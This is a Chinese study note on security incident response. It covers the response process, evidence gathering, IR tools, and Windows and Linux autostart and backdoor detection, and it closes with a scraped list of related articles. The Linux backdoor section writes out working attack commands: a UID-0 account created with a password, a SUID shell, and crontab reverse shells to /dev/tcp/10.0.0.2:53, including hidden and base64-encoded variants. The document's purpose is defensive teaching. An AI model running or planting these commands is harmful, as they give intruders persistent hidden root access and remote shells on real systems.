安全基础--23--应急响应(上)
一、相关概念
应急响应(Incident Response):安全人员在遇到突发事件后所采取的措施和行动。
突发事件:发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。
事件响应:信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。
场景:运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。
职责:控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。
目的:以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。
目标:积极预防、及时发现、快速反应、确保恢复。
二、应急响应流程
1、通用型流程
1、准备(Preparation)
安全支撑平台:防火墙、入侵检测系统(IDS)等
日常安全管理:运维操作记录
应急预案:设备故障应急操作、攻击如何处理、获取外部支持、风险分析(规避措施)
2、检测(Detection)
主动发现:预警的及时性和全局性,为后续处理争取时间
被动发现:网络使用者的报告,业务用户的投诉
影响范围:单用户、多用户,已发生的、处于危险中的(还未发生)
3、分类(Classification)
攻击事件:大流量攻击、业务应用攻击
入侵事件:应用系统后门、web站点入侵
病毒事件:网络蠕虫病毒、ARP欺骗病毒
其他:网络或系统异常、敏感信息泄露
4、抑制(Containment)
已发生安全事件的:采取隔离、用边界控制设备防止网络区域内相互影响
处于危险中的:采取补救加固、漏洞扫描与修补、安全测试
5、根除(Eradication)
安全事件分析-了解危害程度-确定事件原因-针对性防范措施-是否有存在遗漏-调整平台安全策略
6、恢复(Recovery)
对主机和网络控制的恢复
从备份中恢复受损的数据
调整可能影响业务正常运转的策略
7、后续(Follow-up)
总结并指导今后的应急管理
必要时申请司法程序介入
2、个人总结的流程
步骤简述:接案–取证–分析侦察–锁定嫌疑人–结案
接案
1、因为攻击者经验、隐蔽性不足被发现
炫耀型——上传黑页、到此一游.txt
政治目的型——重点攻击政府站点、Anonymous(匿名者)
利益型——暗链、SEO推广、勒索、挖矿
抓鸡型——1433、mysql自动抓鸡、SSH暴力破解
持续型——长期潜伏式攻击、APT
DDOS攻击型——SYN Flood、CC攻击
蠕虫感染型——内网传播、Conficker、WannaCry
取证
1、保护第一现场
操作日志、应用日志
攻击者的残留文件
2、不轻信一面之词
与目击者交流相关细节
亲自核实所述、转述情况
分析侦察
1、三要素法-时间
攻击发现时间
-------目击者报案时间
后门文件时间
-------windows时间问题(创建时间等可以修改)
-------Linux下ctime(change time)
异常时间段内
-------web访问日志、操作系统认证日志、应用设备日志
2、三要素法-地点
webshell首次出现目录
-------上传漏洞——img_upload
-------代码执行——dedecms变量覆盖
-------后台上传——system_upload
残留文件所在目录
-------自动化攻击——批处理文件、shell脚本
-------人为上传\下载——桌面、下载目录
3、三要素法-事件
应用后台日志
-------登录日志——是否有非法账户
-------篡改记录——是否是从数据库修改
-------上传点——黑客最钟爱功能
web访问日志
-------SQL注入——order by
-------暴力破解——认证接口页面
-------代码执行——Struts2、java反序列化漏洞
对外应用访问日志
-------FTP访问日志——日志文件配置
-------SSH认证日志——Accept、Failed
操作历史记录
-------web运行账户——反弹执行命令
-------root用户——是否被提权
-------易受攻击账户——oracle、db2、weblogic
登录日志为二进制格式文件,无法被逐条删除(日志要么全清,要么完整)
—linux
-------wtmp—who -u /var/log/wtmp
-------btmp—last -f /var/log/btmp
-------lastlog—lastlog -f /var/log/lastlog
—windows
-------事件日志大小配置——默认覆盖
-------安全性事件——审核成功与失败
操作系统完整性检查
-------进程:非法程序、dll注入、/proc/PID
-------网络:监听端口、异常连接
-------账户:UID=0(注意Liunx下是无隐藏账号的)、administrators、admin$
-------启动项:crontab –l、inittab、rc.local、services.msc、msconfig
4、回溯攻击法
分析可能被攻击途径,进行模拟攻击
----主机监听端口整理
-------1、对应应用
-----------弱口令——FTP、SSH
-----------暴力破解——MYSQL、MSSQL
-----------代码执行——web攻击、应用漏洞
-------2、对外端口——防火墙策略
密码泄露
-------厂商应用口令——搜索引擎
-------数据库口令——web应用配置文件
中间人攻击
-------ARP攻击——劫持与嗅探
内部发起攻击
-------统一口令——windows域环境
-------溢出攻击——SMB缓冲区漏洞
5、经验法
攻击者常用的目录
-------/var/tmp、/tmp、/dev/shm、RECYCLER
特征文件
-------/tmp/angel_bc—phpspy木马反弹脚本
-------bqufe.sys(随机)—PcShare类远控木马
-------hxdef100.ini—Hacker Defender Rootkit
黑客惯用手法
-------操作系统后门:ushift后门、sshd backdoor
-------一句话木马:插入文件、php变形、包含图片
利用搜索功能
-------包含隐藏文件——Everything
-------n*24H内修改过的文件——find / -ctime -n
锁定嫌疑人
1、木马分析
静态逆向分析——IDA、OllyDbg
动态分析——抓包、内存截取
2、日志分析
web访问——webshell首次访问IP
登录记录——windows&linux
通过nmap扫描确认是否为跳板
结案
1、技术层面
漏洞确认及修补、后门清理与观察、涉及知识点学习、安全攻防技能培训
2、管理层面
报告整理输出、详细整改建议、攻击过程再现、流程制度规范
三、应急响应常用工具
常用应急响应工具及常用命令如下:
常见工具-windows
系统启动相关: Autoruns 、Msconfig 、Net
系统进程分析监控: Process explorer、Process Monitor、Tasklist
端口网络状态: Tcpview、Currports、Netstat
综合安全检测: Wsyscheck、PowerTool、PCHunter、WIN64AST
常见工具-Linux
rookit检查: Rkhunter、chkrookit、LiveCD引导拯救光盘
系统相关命令: ps、pstree、pmap、top、killls、strings、strace、readelf、rmplsof、netstatchkconfig、crontab
通用检查工具
Webshell检查:WebShellKill、HwsKill、EverythingWebshell.py、find、grep、findstr
网络攻击相关: Sniffer Pro、WinArpAttackerTcpdump、wireshark、Colasoft Capsa
日志分析工具: Logview、LogParse、EmEditor
四、后门检测与查杀-windows/linux
1、常见的windows自启动方法
1、开始菜单\程序\启动
2、开机启动项(msconfig)
注册表:HKLM\Software\Microsoft\Windows\CurrentVersion\Run
3、注册为系统服务(services.msc)
4、任务计划启动(Schedule)
5、AUTOEXEC.BAT(NT 5.x)
6、系统程序替换 (ctfmon、conime)
7、组策略脚本(gpedit.msc)
2、特殊的windows自启动方式
1、Load加载
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load
2、Winlogon加载
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
--管理系统各项启动顺序、逗号分隔加入其它程序HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify
--关联特定的事件(安全模式启动)、产生事件通知时检查并调用相关DLL
3、映像劫持IFEO
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
4、DLL劫持
lpk.dll、usp10.dll、ws2help.dll
5、关联特定程序
HKEY_CLASSES_ROOT\txtfile\Shell\open\command
HKLM\SOFTWARE\Microsoft\CommandProcessor\AutoRun
6、ActiveX自启动(DRAT2010)
HKLM\Software\Microsoft\ActiveSetup\InstalledComponents\{…}\stubpath
3、线程注入类木马
将自身线程注入到其他合法程序中,在宿主进程中,以线程的方式执行木马代码。以非进程方式执行代码,可以逃避进程查看器检查,实现进程隐藏。Process Explorer(增强任务管理器)、XueTr(手工杀毒软件)等工具具有查看结束线程以及挂起和恢复线程的功能。
代表木马:灰鸽子远程控制(RAT)。
工具:Process Explorer、XueTr
4、ActiveX启动类木马
Active Setup键值:
--HKLM\Software\Microsoft\ActiveSetup\InstalledComponents
已安装windows组件信息(office、IE、OS)。每个键值作为相应组件在系统中的ID标示。进入桌面时先于其它自启动程序加载。
StubPath=%systemroot%\Trojan.exe
通过线程注入方式,实现木马自身功能。
代表木马:彩虹桥远程监控木马(Bifrost)。
工具:PCHunter-手工杀毒软件
5、DLL注入类木马
由于windows系统服务过多,为了节省系统资源,微软将很多服务做成共享方式,交由svchost进程来启动。服务以dll形式实现,将执行程序指向svchost,由其调用相应服务的动态链接库文件来启动服务。
svchost作为宿主进程,并不提供任何服务系统。svchost是一个用于加载系统服务的宿主程序。此类木马更具迷惑性,同时容易绕过防火墙限制。
代表木马:PcShare远程控制。
工具:Wsyscheck-系统检测工具
6、SSDT HOOK类木马
System Services Descriptor Table(系统服务描述符表)。将Ring3下的Win32 API和Ring0下内核API函数相互联系起来,即告诉系统,需要调用的API在什么地方。
通过修改SSDT表的函数地址可以对常用windows函数及API进行hook,如杀毒软件的主动防御功能即采用此接口来实现监控。利用驱动程序在ring0态将SSDT恢复为原始状态,即可使安全软件的主动防御和监控功能失效。
代表木马:gh0st。
工具:PowerTool-手动杀毒辅助工具
7、windows常见后门
1、windows登陆界面:粘滞键(sethc)、放大镜(magnify)、屏幕键盘(osk)
2、密码截取记录:WinlogonHack、PwDump、wce
3、自启动相关:计划任务、组策略脚本、DLL劫持
4、其他:隐藏(克隆)账户、反弹程序
8、Linux自启动方式
1、/etc/rc.local 开机启动脚本
2、/etc/init.d/ 服务启动脚本
3、/etc/inittab 初始化配置文件
4、crond 自动调度任务(计划任务)
5、/etc/ld.so.preload 加载动态库.so文件
6、环境变量设置如:/etc/profile、.bash_profile、.bash_login、.bash_logout
7、使用patch并编译的文件覆盖正常程序
9、Linux常见后门
1、自启动相关配置文件修改
useradd -u 0 -o -g root -G root r00t;echo r00t:p@ssw0rd | chpasswd
2、SetUID权限位
chmod u+s /tmp/.bash
find / -perm -4000
3、SSHD相关后门
pam认证文件修改(pmap PID | grep security)
sshd backdoor(rpm -vf /usr/sbin/sshd)
10、Linux--crontab后门
1、添加任务
(crontab -l;echo '*/1 * * * * exec 9<>/dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
2、隐藏任务
printf "*/1 * * * * exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n" | crontab -
3、base64编码
exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9
(echo '*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvMTAuMC4wLjIvN =="|base64 –d`;/bin/bash -c "$a";unset a')|crontab -
#注意闭合符号的组合
11、Linux—bash shell后门
1、.bash_profile
用户设置的环境变量,在登陆时执行,调用bashrc
2、.bashrc
登录及打开shell时读取执行,继承profile中变量
3、设置别名与函数。修改.bashrc文件
alias su="~/.subtty su"
alias ssh="~/.subtty ssh“
if [ -z "$SUBTTY" ]; then exec ~/.subtty; fi
12、Linux下相关工具
1、tripwire
文件系统完整性检查,建立指纹数据库。大小、HASH、所有者、群组、存取权限等
2、chkrootkit、rootkit hunter
恶意程序安全查杀工具。rootkit、后门、漏洞利用程序。基于特征关键字检索,可被绕过
13、Linux下手工分析
1、RPM包可信校验
rpm -Vf (ps/pstree/lsof/kill/netstat/ls/dir/find/sshd)
2、进程查看:
pstree / ps -aux (START列为程序开始运行时间)
3、端口状态及网络连接
netstat -lntp (非root用户只能看到部分连接的PID)
lsof -Pnl -i tcp:80
4、进程文件路径
ls -l /proc/PID/exe
5、结束进程
killall httpd
kill -9 “ps -ef | grep test | awk '{print $2}'”
6、状态检查
top(内存/CPU排序)、lsmod(内核模块)
ls -last(按修改时间排序)、stat(文件访问、修改、状态改动时间)
7、启动项检查
ls -lh /var/spool/cron/
chkconfig --list |grep 3:on
安全基础--23--应急响应(上)相关推荐
- 【应急响应】没有痕迹该如何进行最优解
应急响应或者技术人员的方法论 在叙述本次应急响应前,先把方法论的前因后果讲解一下,以便可以带着方法论进入问题处置的过程,这样体会可能会更好一点,以便可以帮助到正在提升的我们. 因为技术人员不能只关注技 ...
- 【认证证书】计算机应急响应 - 中国信息安全测评中心CISP-IRE | 公安部第三研究所CCSS-R
计算机应急响应 中国信息安全测评中心CISP-IRE 知识体系 简略图片版 详细[官方(中国信息安全测评中心)](http://www.itsec.gov.cn/ryzc/rsqsxz/)版 考核方式 ...
- windows环境下的基础应急响应知识
前言 现在搞安全也越来越卷了感觉,所以来学习一波应急响应,不论是甲方工作还是在乙方工作,这项技能都是能用得上的,所以感觉还不错,学习起来,本篇文章问windows响应的基础内容学习总结. 用户安全检测 ...
- 网络安全应急响应-基础技能
网络安全应急响应专题文章: 1. 网络安全应急响应-日志分析技术 2. 网络安全应急响应-流量分析技术 3. 网络安全应急响应-恶意代码分析技术 4. 网络安全应急响应-终端检测与响应技术 5. 网络 ...
- 《网络安全应急响应技术实战指南》知识点总结(第1~2章 网络安全应急响应概述和基础技能)
一.应急响应概念 一个组织为应对各种意外事件的发生所做的准备,以及在时间发生之后所采取的措施,以减少突发事件造成的损失. 二.应急响应流程 PDCERF方法: 准备阶段(预防) 检测阶段(检测已发生或 ...
- 运维基础(15) Linux 应急响应
Linux 环境下处理应急响应事件往往会更加棘手,因为相比于 Windows ,Linux 没有像 Autorun.procexp 这样的应急响应利器,也没有统一的应急响应处理流程. 所以 ,本文将会 ...
- 复现应急响应文章之找到了自己服务器上的病毒
前言概述 处理linux应急响应主要分为4个环节: 识别现象->清除病毒->闭环兜底->系统加固 前言概述 本文是根据其他复现文章复现检查了一下自己的服务器,最终发现了自己的云服务器 ...
- 【应急基础】安全应急响应工具年末大放送(含下载)
为了帮助安全分析师更好的完成工作,小编整理了一些现在比较流行的安全应急响应工具和资源,从磁盘镜像创建工具.内存分析工具到内存镜像工具.沙盒/逆向工具等,相信总有一款适合你. 磁盘镜像创建工具 GetD ...
- Windows应急响应排查思路,应急响应基础技能
「作者简介」:CSDN top100.阿里云博客专家.华为云享专家.网络安全领域优质创作者 「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏<网络安全入门到精通> Windows应急响应 ...
最新文章
- golang select关键字用法
- python现在最新的版本-Python 3.8 已发布,现在是切换至新版本的好时机吗?
- 【论文推荐】张笑钦团队 | 综述:基于深度学习的视觉跟踪方法进展
- 使用命令行工具mc连接SAP云平台Leonardo机器学习服务的AWS存储
- 404 Not Found: Requested route ('jerrylist.cfapps.eu10.hana.ondemand.com') does not exist
- 关于HibernateDaoSupport中的getHibernateTemplate().execute及executeFind方法
- [Redux/Mobx] redux的thunk作用是什么?
- [转]看懂 Serverless,这一篇就够了
- 江苏省计算机一级考试难度,浅谈江苏省计算机等级考试(一级除外)
- 利用Python画出《人民日报》各国疫情图——南丁格尔玫瑰图
- 扒谱大杂烩-都是前辈写的
- 《大学物理》课程考试大纲
- hacker vip教程
- C++11 右值引用和移动语义
- logrotate详情和坑点
- DNA存储,拯救人类数据危机的良方?
- 【java】Eclipse错误: 找不到或无法加载主类或项目无法编译10种解决大法!
- python练习 002 斜边上的高
- ThinkPHP历史漏洞
- matlab励磁电路图,发电机的励磁方法及工作原理